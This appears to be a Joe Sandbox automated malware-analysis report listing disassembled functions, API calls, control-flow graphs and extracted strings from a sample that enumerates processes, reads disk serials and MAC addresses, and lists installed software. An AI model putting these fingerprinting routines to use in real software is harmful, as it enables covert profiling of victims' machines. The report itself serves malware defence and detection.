                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressLibraryProc$AdaptersDirectoryEnterFreeInfoInit_thread_footerInitializeLeaveLoadSystem
                                                                                                                                                                                                          • String ID: Appe$GetAdaptersInfo$Path$iphlpapi.dll
                                                                                                                                                                                                          • API String ID: 1616508286-1552646832
                                                                                                                                                                                                          • Opcode ID: 1edd6e4c4d1f834106fb67e53f20c82a667814674a90d2a2a0b6453cc7e3a85a
                                                                                                                                                                                                          • Instruction ID: 600854405f1a26696b3c7de736002c1e2b6794db6764d014896bd2a219028a9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1edd6e4c4d1f834106fb67e53f20c82a667814674a90d2a2a0b6453cc7e3a85a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E51F271A002599FCB24DFB8C8546EEBBB5AF16300F0445EBE45DE7242DB349A88CF65
                                                                                                                                                                                                          Function 00483970 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98processlibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 004839FF
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00483A15
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00483A24
                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00483A4C
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00483A53
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00483A7B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseHandleProcess32$AddressCreateEnterFirstInit_thread_footerInitializeLeaveNextProcSnapshotToolhelp32
                                                                                                                                                                                                          • String ID: Snap$shot
                                                                                                                                                                                                          • API String ID: 241911490-4032188263
                                                                                                                                                                                                          • Opcode ID: 3b025c79f9221de9c3128e3db336f9eff6532691b060f109fd76236a8ef8a551
                                                                                                                                                                                                          • Instruction ID: bcfc7a51d13a840dfb915e2186f7738b2a9a8e2f9ecd4835eebd97d0d536948a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b025c79f9221de9c3128e3db336f9eff6532691b060f109fd76236a8ef8a551
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 013184356097419BD320EF68DC897AFB7D8EFC5715F00491EF99DC2280EB74950487A6
                                                                                                                                                                                                          Function 0048F7E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F85D
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,00000000,0000000C,?,00000800,00000000,00000000), ref: 0048F8D0
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0048FA19
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0048FA20
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                                          • API String ID: 4026078076-2935326385
                                                                                                                                                                                                          • Opcode ID: 26a109bb306a2b735817eb4d63b2e072ca32aac009c5cafa4deea32d63d42775
                                                                                                                                                                                                          • Instruction ID: 49810f156e84413fbb9d0ae973cc4d75f0afff07210655de5e1847eb7a514f9e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26a109bb306a2b735817eb4d63b2e072ca32aac009c5cafa4deea32d63d42775
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B051537594021C6BEB20EB90DC45FDEB77CAB54704F1041E7E609A61C2EB74AB88CFA4
                                                                                                                                                                                                          Function 0048F380 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F410
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0048F459
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,0007C088,00000200,00000020,?,00000210,00000000,00000000), ref: 0048F50A
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F17B
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F18A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0048F5B7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::task_continuation_context::task_continuation_contextControlDevice$CloseCreateFileHandle
                                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                                          • API String ID: 1965763561-2935326385
                                                                                                                                                                                                          • Opcode ID: 2cf4ba7a51fadd37345ffbb9f5bf5e04af343b3b7879102c1c8590a62626aa70
                                                                                                                                                                                                          • Instruction ID: d93b69fd839a378a64cbd2de74eac878bc54bf4f98035448b354ecb699a6860c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf4ba7a51fadd37345ffbb9f5bf5e04af343b3b7879102c1c8590a62626aa70
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD5182B1D8021CAAEB20DB149C86BDDB778AF55704F4045E9A608671C3EA742BC9CF5D
                                                                                                                                                                                                          Function 0046D180 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,04071060), ref: 0046D1E9
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046D20D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                          • String ID: .dll$pi32$rasa
                                                                                                                                                                                                          • API String ID: 2574300362-1171601560
                                                                                                                                                                                                          • Opcode ID: 282e85a8e29a636c75e80827ee9ef6189721a69257591488fed5861b08c5999c
                                                                                                                                                                                                          • Instruction ID: 8ba69286e2875fa04e2028cc30cfcc9fecd9a4cef30ff8113009bae58c8e748d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 282e85a8e29a636c75e80827ee9ef6189721a69257591488fed5861b08c5999c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 041179B0C04209DFDB00CF98E9457AEFBF8FB08704F10861EE815A3250EB74AA04CBA0
                                                                                                                                                                                                          Function 00467280 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00414B40: RtlInitializeCriticalSection.NTDLL(00597C34), ref: 00414BAE
                                                                                                                                                                                                            • Part of subcall function 00414B40: __Init_thread_footer.LIBCMT ref: 00414BCA
                                                                                                                                                                                                            • Part of subcall function 00414B40: RtlEnterCriticalSection.NTDLL(00597C34), ref: 00414BE5
                                                                                                                                                                                                            • Part of subcall function 00414B40: RtlLeaveCriticalSection.NTDLL(00597C34), ref: 00414C39
                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,00002880), ref: 004672FE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • %02X-%02X-%02X-%02X-%02X-%02X, xrefs: 00467392
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AdaptersEnterInfoInit_thread_footerInitializeLeave
                                                                                                                                                                                                          • String ID: %02X-%02X-%02X-%02X-%02X-%02X
                                                                                                                                                                                                          • API String ID: 3854266947-960560484
                                                                                                                                                                                                          • Opcode ID: 9e23a888994caeda64439ce0ad4aabf21f5f9e37cad4cdececbd54cfffda7eff
                                                                                                                                                                                                          • Instruction ID: 27a56018961e61ea3aa1aafbc4271de6f5053c71d0accbddf7e508503ec92722
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e23a888994caeda64439ce0ad4aabf21f5f9e37cad4cdececbd54cfffda7eff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5613C71A042549FDB31CF64CC59BDABBB4AF05314F0441CAE55997682EF38AAC4CB52
                                                                                                                                                                                                          Function 0041ED10 Relevance: 118.5, APIs: 5, Strings: 62, Instructions: 1281libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 174 41ed10-41edcf call 415dc0 179 41f5b1-41f5cc call 513805 174->179 180 41edd5-41eddb 174->180 180->179 182 41ede1-41ee06 call 5165e0 180->182 186 41ee10-41ee22 call 415dc0 182->186 189 41ee24-41ee46 GetProcAddress 186->189 190 41ee49-41ee70 186->190 189->190 192 41ee76-41ee82 190->192 193 41f578-41f58a call 415dc0 190->193 195 41ee85-41ee8e 192->195 198 41f5ab-41f5ae 193->198 199 41f58c-41f5a8 GetProcAddress 193->199 195->195 197 41ee90-41ee97 195->197 197->186 200 41ee9d-41eea9 call 408050 197->200 198->179 199->198 203 41eec7-41eeda 200->203 204 41eeab-41eec4 GetProcAddress 200->204 203->186 206 41eee0-41eeec call 408050 203->206 204->203 209 41ef0a-41ef1d 206->209 210 41eeee-41ef07 GetProcAddress 206->210 209->186 212 41ef23-41ef7a call 40b650 call 40b7a0 209->212 210->209 217 41ef80-41ef89 212->217 217->217 218 41ef8b-41efcc call 40b7a0 call 415dc0 217->218 223 41eff3-41f010 218->223 224 41efce-41eff0 GetProcAddress 218->224 226 41f4b1-41f4c1 223->226 227 41f016-41f0d8 call 5165e0 * 2 call 415dc0 call 46bc20 call 415dc0 call 46bc20 call 415dc0 call 46bb40 223->227 224->223 229 41f4f8-41f515 226->229 230 41f4ee-41f4f5 call 513d74 226->230 248 41f0e0-41f0e9 227->248 229->186 230->229 248->248 249 41f0eb-41f0f2 248->249 249->226 250 41f51a-41f54a call 5165e0 249->250 250->229 253 41f54c-41f561 250->253 253->230 254 41f563-41f571 253->254 254->193 255 41f5cf-41f98e call 51b528 call 470690 call 41bf60 call 470880 call 471d90 call 470dd0 call 470ca0 call 41bf60 call 470880 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 41bf60 call 408e10 call 470880 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 41bdd0 call 467500 254->255 372 41f993-421351 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 4708e0 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 470690 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 471d90 call 470dd0 call 470690 call 471d90 call 470dd0 call 470690 call 471d90 call 470dd0 call 470690 call 471d90 call 470dd0 call 470790 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 470790 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 4707c0 call 471d90 call 470dd0 call 470ca0 call 47f210 call 47f270 call 408be0 call 40d7e0 call 47f1c0 call 470ca0 * 5 call 470690 call 421b40 call 421ff0 * 7 call 40b530 * 7 call 470ca0 call 421b40 call 421de0 255->372
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0041EE44
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0041EEC2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0041EF05
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressCriticalProcSection$EnterInit_thread_footerInitializeLeave
                                                                                                                                                                                                          • String ID: &inf=$.NET Framework$DisplayName$Key$Publisher$P}A$RegC$RegE$RegO$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$StrS$appid$avlt$avs$bclk$cid$ckw$clr$cont$conw$ddr$dlr$etrc$etrc2$eyEx$eyEx$fre$frr$gqp$kspdf$kspic$kszip$lbc$lbcr$lose$mbp$md5$mdo$microsoft$mio$mnri$numK$p1t$p2t$p3t$p4t$penK$pgid$pgtp$round$sbclk$sftck$sftk$sid$sk2id$skid$slg$trIW$trIW$tskid$uid$zid
                                                                                                                                                                                                          • API String ID: 1294845845-3276813324
                                                                                                                                                                                                          • Opcode ID: 298135c10aa60212f5c364afa4904734bb7c0ad070eef5cc20314be292253638
                                                                                                                                                                                                          • Instruction ID: 42cb36eda225d88379692d1e440af2bd53be63478b1ccf7c2c8711e0ac85645b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 298135c10aa60212f5c364afa4904734bb7c0ad070eef5cc20314be292253638
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54C2B230911258EEDF14EBA5DD45BEEBBB4BF10308F40819EE049A3191EB786B48DF95
                                                                                                                                                                                                          Function 004697F0 Relevance: 105.4, APIs: 21, Strings: 39, Instructions: 448libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 730 4697f0-469879 call 4552d0 733 4698a7-4698bd SetupDiGetClassDevsW 730->733 734 46987b-4698a4 GetProcAddress 730->734 735 469e92-469ea2 call 513805 733->735 736 4698c3-4698cd 733->736 734->733 737 4698d0-4698dc call 4552d0 736->737 742 4698de-469909 GetProcAddress 737->742 743 46990c-469926 737->743 742->743 745 46992c-46994e call 5165e0 call 4552d0 743->745 746 469e39-469e45 call 4552d0 743->746 755 469982-4699a8 SetupDiGetDeviceRegistryPropertyA 745->755 756 469950-46997f GetProcAddress 745->756 752 469e87-469e90 SetupDiDestroyDeviceInfoList 746->752 753 469e47-469e84 GetProcAddress 746->753 752->735 753->752 757 4699ae-4699c6 call 524e26 755->757 758 469d48-469d4e 755->758 756->755 757->758 761 4699cc-4699d8 call 4552d0 757->761 758->737 764 469a0c-469a32 SetupDiGetDeviceRegistryPropertyA 761->764 765 4699da-469a09 GetProcAddress 761->765 764->758 766 469a38-469a72 call 51ac8c * 2 call 408050 764->766 765->764 773 469a74-469a8d GetProcAddress 766->773 774 469a90-469aa3 766->774 773->774 776 469e27-469e33 774->776 777 469aa9-469ab5 call 408050 774->777 776->746 780 469ab7-469ad0 GetProcAddress 777->780 781 469ad3-469ae6 777->781 780->781 783 469e13-469e25 781->783 784 469aec-469af8 call 408050 781->784 783->746 787 469b16-469b29 StrStrIA 784->787 788 469afa-469b13 GetProcAddress 784->788 789 469dff-469e11 787->789 790 469b2f-469b3b call 408050 787->790 788->787 789->746 793 469b3d-469b56 GetProcAddress 790->793 794 469b59-469b6c 790->794 793->794 796 469b72-469b7e call 408050 794->796 797 469deb-469dfd 794->797 800 469b80-469b99 GetProcAddress 796->800 801 469b9c-469baf 796->801 797->746 800->801 803 469dd7-469de9 801->803 804 469bb5-469bc1 call 408050 801->804 803->746 807 469bc3-469bdc GetProcAddress 804->807 808 469bdf-469bf2 804->808 807->808 810 469dc3-469dd5 808->810 811 469bf8-469c04 call 408050 808->811 810->746 814 469c06-469c1f GetProcAddress 811->814 815 469c22-469c35 811->815 814->815 817 469daf-469dc1 815->817 818 469c3b-469c47 call 408050 815->818 817->746 821 469c65-469c78 818->821 822 469c49-469c62 GetProcAddress 818->822 824 469c7e-469c8a call 408050 821->824 825 469d98-469daa 821->825 822->821 828 469c8c-469ca5 GetProcAddress 824->828 829 469ca8-469cbb 824->829 825->746 828->829 831 469d81-469d93 829->831 832 469cc1-469ccd call 408050 829->832 831->746 835 469ccf-469ce8 GetProcAddress 832->835 836 469ceb-469cfe 832->836 835->836 838 469d00-469d0c call 408050 836->838 839 469d6a-469d7c 836->839 842 469d33-469d46 838->842 843 469d0e-469d30 GetProcAddress 838->843 839->746 842->758 845 469d53-469d65 842->845 843->842 845->746
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlInitializeCriticalSection.NTDLL(00597F68), ref: 00455352
                                                                                                                                                                                                            • Part of subcall function 004552D0: __Init_thread_footer.LIBCMT ref: 0045536E
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlEnterCriticalSection.NTDLL ref: 00455389
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlLeaveCriticalSection.NTDLL(00597F68), ref: 004553E1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004698A2
                                                                                                                                                                                                          • SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,0000000E,00000000,00000020,7591F550), ref: 004698B2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469907
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046997D
                                                                                                                                                                                                          • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000007,00000000,?,000007FE,00000000), ref: 004699A4
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469A07
                                                                                                                                                                                                          • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,00000000,?,000007FE,00000000), ref: 00469A2E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469A8B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00469ACE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469B11
                                                                                                                                                                                                          • StrStrIA.SHLWAPI(?,richdisk), ref: 00469B25
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469B54
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469B97
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469BDA
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469C1D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469C60
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469CA3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469CE6
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469D2E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469E82
                                                                                                                                                                                                          • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00469E90
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
